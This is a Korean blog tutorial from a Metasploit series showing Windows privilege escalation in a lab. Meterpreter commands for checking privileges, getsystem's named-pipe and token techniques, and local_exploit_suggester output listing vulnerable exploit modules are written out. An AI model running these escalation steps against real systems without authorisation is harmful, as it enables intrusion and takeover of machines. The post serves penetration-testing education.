8/07/2017

[MAD-METASPLOIT] 0x32 - Privilige Escalation

on   in ,   with No comments



win_privs를 통한 권한 확인


post/windows/gather/win_privs


meterpreter > run post/windows/gather/win_privs

Current User
============

 Is Admin  Is System  Is In Local Admin Group  UAC Enabled  Foreground ID  UID
 --------  ---------  -----------------------  -----------  -------------  ---
 False     False      True                     False        1              "HAHWUL\\Test-Virtualbox"

Windows Privileges
==================

 Name
 ----
 SeChangeNotifyPrivilege


getsystem을 통해 자동 권한상승

meterpreter > getsystem -h
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h        Help Banner.
    -t <opt>  The technique to use. (Default to '0').
0 : All techniques available
1 : Named Pipe Impersonation (In Memory/Admin)
2 : Named Pipe Impersonation (Dropper/Admin)
3 : Token Duplication (In Memory/Admin)


meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).


local_exploit_suggester를 이용하여 local exploit 찾기


meterpreter > run post/multi/recon/local_exploit_suggester

[*] 192.168.56.101 - Collecting local exploits for x86/windows...
[*] 192.168.56.101 - 37 exploit checks are being tried...
[+] 192.168.56.101 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.





HAHWUL

Security engineer, Gopher and H4cker!
Share: | Coffee Me:

0 개의 댓글:

Post a Comment